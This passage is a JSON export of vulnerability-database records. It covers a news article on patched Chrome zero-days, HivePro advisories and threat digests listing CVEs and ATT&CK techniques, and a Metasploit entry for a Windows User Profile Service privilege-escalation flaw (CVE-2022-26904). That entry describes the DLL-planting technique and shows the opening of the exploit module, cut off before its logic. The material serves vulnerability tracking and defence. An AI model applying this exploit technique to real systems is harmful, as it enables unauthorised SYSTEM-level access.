{"lastseen": "2022-07-05T11:54:40", "description": "While people were celebrating the Fourth of July holiday in the United States, Google quietly rolled out a stable channel update for Chrome to patch an actively exploited zero-day vulnerability, the fourth such flaw the vendor has had to patch in its browser product so far this year.\n\nChrome 103 (103.0.5060.71) for Android and Version 103.0.5060.114 for Windows and Mac, outlined in [separate ](<https://chromereleases.googleblog.com/>)[blog posts](<https://chromereleases.googleblog.com/2022/07/extended-stable-channel-update-for.html>) published Monday, fix a heap buffer overflow flaw in WebRTC, the engine that gives the browser its real-time communications capability.\n\nThe vulnerability, tracked as [CVE-2022-2294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2294>) and reported by Jan Vojtesek from the Avast Threat Intelligence team on July 1**, **is described as a buffer overflow, \u201cwhere the buffer that can be overwritten is allocated in the heap portion of memory,\u201d according to the vulnerability\u2019s [listing](<https://cwe.mitre.org/data/definitions/122.html>) on the Common Weakness Enumeration (CWE) website.\n\nAs per usual, Google did not reveal specific details about the bug, as it generally waits until most have updated to the patched version of the affected product. Indeed, updating is strongly recommended, as exploits for the vulnerability already exist in the wild, Google said.\n\nMoreover, with scant details revealed about the flaw\u2014a habit of Google\u2019s that many security researchers find frustrating\u2014at this point an update is really only way to defend against attacks exploiting the flaw. Fortunately, Google Chrome updates are pushed out without user intervention, so most users will be protected once patches are available.\n\nBuffer overflows generally lead to crashes or other attacks that make the affected program unavailable including putting the program into an infinite loop, according to the CWE listing. Attackers can take advantage of the situation by using the crash to execute arbitrary code typically outside of the scope of the program\u2019s security policy.\n\n\u201cBesides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker\u2019s code,\u201d according to the listing. \u201cEven in applications that do not explicitly use function pointers, the run-time will usually leave many in memory.\u201d\n\n## **Other Fixes**\n\nIn addition to fixing the zero-day buffer overflow flaw, the Chrome releases also patch a type confusion flaw in the V8 JavaScript engine tracked as [CVE-2022-2295](<https://security-tracker.debian.org/tracker/CVE-2022-2295>) and reported June 16 by researchers \u201cavaue\u201d and \u201cBuff3tts\u201d at S.S.L., according to the post.\n\nThis is the third such flaw in the open-source engine used by Chrome and Chromium-based web browsers patched this year alone. In March a separate type-confusion issue in the V8 JavaScript engine tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1096>) and under active attack [spurred a hasty patch](<https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/>) from Google.\n\nThen in April, the company patched [CVE-2022-1364](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1364>), another type confusion flaw affecting Chrome\u2019s use of V8 on which attackers already had pounced.\n\nAnother flaw patched in Monday\u2019s Chrome update is a use-after-free flaw in Chrome OS Shell reported by Khalil Zhani on May 19 and tracked as [CVE-2022-2296](<https://cve.report/CVE-2022-2296>), according to Google. All of the flaws patched in this week\u2019s update received a rating of high. The updates also includes several fixes from internal audits, fuzzing and other initiatives, Google said.\n\nPrior to patching the Chrome V8 JavaScript engine flaws in March and April, Google in February already had patched a zero-day use-after-free flaw in Chrome\u2019s Animation component tracked as [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>) that [was under active attack](<https://threatpost.com/google-chrome-zero-day-under-attack/178428/>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T11:54:21", "type": "threatpost", "title": "Google Patches Actively Exploited Chrome Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-05T11:54:21", "id": "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "href": "https://threatpost.com/actively-exploited-chrome-bug/180118/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-04-22T17:42:03", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Microsoft addressed 128 vulnerabilities in there April patch Tuesday update. Two of them have been categorized as zero-day vulnerabilities. One of the two zero-days is exploited-in-the-wild as well. The vulnerability, CVE-2022-24521, has been exploited in the wild. By exploiting this flaw in the Windows Common Log File System (CLFS) driver, an attacker can escalate privileges. The second zero-day is CVE-2022-26904, which is discovered in the Windows User Profile Service also permits the escalation of privileges. Despite being listed as more likely to be exploited, it has a high attack complexity, and successful exploitation requires an attacker to win a race condition. Organizations have advised the patch all these vulnerabilities as soon as possible to avoid exploitation. Potential MITRE ATT&CK TTPs are: TA0042: Resource Development T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities TA0001: Initial Access T1190: Exploit Public-Facing Application TA0004: Privilege Escalation T1068: Exploitation for Privilege Escalation Vulnerability Detail Patch Links https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 References https://www.cisa.gov/uscert/ncas/current-activity/2022/04/12/microsoft-releases-april-2022-security-updates", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T05:08:02", "type": "hivepro", "title": "Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-26904"], "modified": "2022-04-14T05:08:02", "id": "HIVEPRO:F62D9BF485959B812585A48122216FD7", "href": "https://www.hivepro.com/microsoft-patch-tuesday-april-2022-addressed-two-zero-day-vulnerabilities/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T15:49:25", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary The threat actors behind the Cuba ransomware have stepped up their game by using a new Remote Access Trojan called ROMCOM and weaponizing a local privilege escalation vulnerability(CVE-2022-24521). A wide range of industries was targeted, including professional and legal services and state and local government.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T12:34:37", "type": "hivepro", "title": "Zero-day vulnerability leveraged to deploy Cuba Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-08-11T12:34:37", "id": "HIVEPRO:AB4C2A84604B0434A37D2695927D9A64", "href": "https://www.hivepro.com/zero-day-vulnerability-leveraged-to-deploy-cuba-ransomware/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-25T14:28:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. While Proof-of-concept is been available for some time now, it is not been actively exploited in the wild. This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team, published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the "profext.dll" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below: 1. Update Windows 10 to the latest March 2022 patch.2. Create a free account in 0patch Central3. Install and register the 0patch Agent4. An automated micro-patching process will initiate to apply this patch. Potential MITRE ATT&CK TTPs are: TA0042: Resource DevelopmentT1588: Obtain CapabilitiesT1588.006: Obtain Capabilities: VulnerabilitiesTA0001: Initial AccessT1190: Exploit Public-Facing ApplicationTA0004: Privilege EscalationT1068: Exploitation for Privilege EscalationTA0005: Defense Evasion T1548: Abuse Elevation Control Mechanism Vulnerability Details References https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484 https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/ https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T13:56:19", "type": "hivepro", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "modified": "2022-03-25T13:56:19", "id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "href": "https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-21T07:30:07", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 765 14 1 2 6 25 The third week of April 2022 witnessed a huge spike on the discovery of 765 vulnerabilities out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, there were 5 zero-day, 9 of them are undergoing analysis and 2 other vulnerabilities about which the National vulnerability Database (NVD) is awaiting analysis while 1 was not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. Further, we also observed a Threat Actor groups being highly active in the last week. OldGremlin, a Russian threat actor group popular for financial crime and gain, was observed targeting Russian agencies Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-24521* CVE-2022-26904* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 CVE-2022-1364* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2022-22954* CVE-2022-22955 CVE-2022-22956 CVE-2022-22957 CVE-2022-22958 CVE-2022-22959 CVE-2022-22960* CVE-2022-22961 https://kb.vmware.com/s/article/88099 CVE-2018-6882 https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7 CVE-2022-25165 CVE-2022-25166 https://aws.amazon.com/vpn/client-vpn-download/ *zero-day vulnerability Active Actors: Icon Name Origin Motive OldGremlin Russia Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0011: Command and Control T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1555: Credentials from Password Stores T1071: Application Layer Protocol T1592.001: Hardware T1583.002: DNS Server T1566: Phishing T1059.007: JavaScript T1068: Exploitation for Privilege Escalation T1027: Obfuscated Files or Information T1555.004: Windows Credential Manager T1071.004: DNS T1592.002: Software T1583.001: Domains T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1071.001: Web Protocols T1590: Gather Victim Network Information T1587: Develop Capabilities T1566.002: Spearphishing Link T1204: User Execution T1132: Data Encoding T1590.005: IP Addresses T1587.001: Malware T1204.002: Malicious File T1132.001: Standard Encoding T1585: Establish Accounts T1204.001: Malicious Link T1568: Dynamic Resolution T1585.002: Email Accounts T1568.002: Domain Generation Algorithms T1588: Obtain Capabilities T1573: Encrypted Channel T1588.006: Vulnerabilities T1573.001: Symmetric Cryptography T1572: Protocol Tunneling Threat Advisories: Two actively exploited vulnerabilities affect multiple VMware products Google Chrome issues an emergency update to address the third zero-day of year 2022 Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities Old Zimbra vulnerability used to target Ukrainian Government Organizations Two Vulnerabilities discovered in AWS Client VPN OldGremlin, a threat actor targeting Russian organizations with phishing emails since 2020", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T04:59:07", "type": "hivepro", "title": "Weekly Threat Digest: 11 \u2013 17 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6882", "CVE-2022-1364", "CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961", "CVE-2022-24521", "CVE-2022-25165", "CVE-2022-25166", "CVE-2022-26904"], "modified": "2022-04-21T04:59:07", "id": "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D", "href": "https://www.hivepro.com/weekly-threat-digest-11-17-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-05-27T15:11:57", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also corralate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-07T15:48:08", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n 